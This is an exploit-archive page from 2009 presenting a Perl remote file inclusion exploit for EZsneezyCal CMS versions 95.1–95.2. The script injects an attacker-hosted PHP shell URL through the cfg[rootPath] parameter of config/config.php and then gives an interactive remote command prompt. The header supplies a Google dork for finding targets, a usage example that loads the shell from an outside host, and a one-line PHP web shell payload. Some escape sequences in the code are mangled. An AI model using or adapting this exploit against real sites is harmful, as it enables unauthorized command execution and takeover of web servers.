[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : EZsneezyCal CMS 95.1-95.2 File Inclusion Vulnerability
# Published : 2009-10-12
# Author : kaMtiEz
# Previous Title : Community Translate File Inclusion Vulnerability
# Next Title : Dazzle Blast Remote File Inclusion


#!/usr/bin/perl

#####
# [+] Author	: kaMtiEz (kamzcrew@gmail.com)
# [+] Date 	: September 30, 2009
# [+] Homepage	: http://www.indonesiancoder.com
# [+] Vendor 	: http://www.jdtmmsm.com/
# [+] Download 	: http://www.jdtmmsm.com/downloads/index.php?expA=1
# [+] version 	: v95.1 - 95.2
# [+] Method	: Remote File Inclusion 
# [+] Dork 	: "Kill-9"+"IndonesianCoder"
# [+] Location 	: INDONESIA
# [~] Notes	:
# makasih buad babe and enyak ma ade .... muach ..
# sayang jangan marah dong .. maaf kemarin bangun jam 8 malem .. :(
# buat vycOd kuliah coy ojo fbnan wae ! wkwkwkwk
# pagi jam 10 ditemani don tukulesto .. dan setelah mencoba akhirnya dapet vuln .. zzzzzzzzzzzzzzzzz
# Aura Kasih : Apakah harus kaMtiEz, atau Don Tukulesto yang aku pilih ?
# [~] Usage	:
# perl kaMz.pl <target> <weapon url> <cmd>
# perl kaMz.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system($_GET['cmd']); ?>
#####
use HTTP::Request;
use LWP::UserAgent;
$Tux = $ARGV[0];
$Pathloader = $ARGV[1];
$oliv = $ARGV[2];
if($Tux!~/http:/// || $Pathloader!~/http:/// || !$oliv){usage()}
head();
sub head()
 {
 print "[X]============================================================================[X]rn";
 print " |			EZsneezyCal CMS Remote File Inclusion			|rn";
 print "[X]============================================================================[X]rn";
 }
while()
{
      print "[w00t] $";
while(<STDIN>)
      {
              $kamz=$_;
              chomp($kamz);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Tux.'config/config.php?cfg[rootPath]='.$Pathloader.'?&'.$oliv.'='.$kamz)or die "nCould Not connectn";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[n]/[í]/;
if (!$kamz) {print "nPlease Enter a Commandnn"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request denied!/ || $return =~/: Cannot execute a blank command in /)
      {print "nCann't Connect to cmd Host or Invalid Commandn";exit}
elsif ($return =~/^<br./>.<b>Fatal.error/) {print "nInvalid Command or No Returnnn"}
if($return =~ /(.*)/)
{
      $finreturn = $1;
      $finreturn=~ tr/[í]/[n]/;
      print "rn$finreturnnr";
      last;
}
else {print "[w00t] $";}}}last;
sub usage()
 {
 head();
 print " | Usage: perl kaMz.pl <target> <weapon url> <cmd>                              |rn";
 print " | <Site> - Full path to execute ex: http://127.0.0.1/path/                     |rn";
 print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt    |rn";
 print " | <cmd> - Command variable used in php shell                                   |rn";
 print "[X]============================================================================[X]rn";
 print " | 	IndonesianCoder Team	| KILL-9 CREW | KIRIK CREW | AntiSecurity.org   |rn";
 print " |   tukulesto, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S    |rn";
 print " |  Jack-, Contrex, onthel, yasea, bugs, olivia, Jovan, Aar, Ardy, invent, Ronz |rn";
 print " |    Coracore, black666girl, NepT, ichal, tengik, och3_an3h, rendy and YOU!!   |rn";
 print "[X]============================================================================[X]rn";
 print " |	http://www.IndonesianCoder.org	   |	http://www.AntiSecRadio.fm 	|rn";
 print "[X]============================================================================[X]rn";
 exit();
 }